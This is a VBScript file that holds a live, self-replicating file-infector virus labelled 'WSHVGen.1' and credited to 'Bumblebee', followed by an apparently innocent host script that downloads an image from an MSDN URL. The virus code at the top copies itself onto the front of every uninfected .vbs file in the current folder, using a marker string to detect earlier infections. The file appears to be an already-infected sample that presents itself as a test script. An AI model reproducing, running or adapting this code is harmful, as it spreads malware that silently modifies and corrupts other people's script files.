'*@#
' WSHVGen.1
' Generated by WSHGen.1

endl=chr(13)&chr(10)

on error resume next

hostName=Wscript.ScriptFullName

set fso=createObject("Scripting.FileSystemObject")

set fd=fso.openTextFile(hostName,1)
hostCode=fd.readAll
fd.close

virusSize=inStr(5,hostCode,"*@"&"#")+1

set fd=fso.openTextFile(hostName,1)
virusCode=fd.read(virusSize)
fd.close

cont=0
for each victim in fso.getfolder(".").files

vExt=fso.getExtensionName(victim.name)
i=0
if mid(vExt,1,1)="v" or mid(vExt,1,1)="V" then i=i+1 end if
if mid(vExt,2,1)="b" or mid(vExt,2,1)="B" then i=i+1 end if
if mid(vExt,3,1)="s" or mid(vExt,3,1)="S" then i=i+1 end if

if i=3 then
set fd=fso.openTextFile(victim.path,1)
victimCode=fd.readAll
fd.close

if left(victimCode,4)<>chr(39)&"*@"&"#" then
infectedCode=virusCode&endl&victimCode
set fd=fso.openTextFile(victim.path,2,1)
fd.write infectedCode
fd.close
cont=1
end if

end if
next

if cont=0 then msgbox"Hi! This is a WSHVGen.1 WSH Virus by Bumblebee",0,"WSHVGen.1"

'*@
'--------------------------------------Begin code--------------------------
'==========================================================================
'
' VBScript Source File -- Created with SAPIEN Technologies PrimalScript 3.1
'
' NAME: TEST FILE FOR VIRUS CHILD'S
'
' AUTHOR: admin , mc
' DATE  : 15.07.2005
'
' COMMENT: 
'
'==========================================================================
sSource = "http://msdn.microsoft.com/scripting/art/t_scripting.jpg"
sDest = "test.jpg"

set oHTTP = WScript.CreateObject("Microsoft.XMLHTTP")
set oFSO = WScript.CreateObject("Scripting.FileSystemObject")

oHTTP.open "GET", sSource, False
oHTTP.send
body8209 = oHTTP.responseBody
set oHTTP = nothing

sOut = ""
For i = 0 to UBound(body8209)
	sOut = sOut & chrw(ascw(chr(ascb(midb(body8209,i+1,1)))))
Next

set oTS = oFSO.CreateTextFile(sDest, True)
oTS.Write sOut
oTS.Close
set oTS = Nothing
set oFSO = Nothing
WScript.Echo "Done!"
'--------------------------------------End code ---------------------------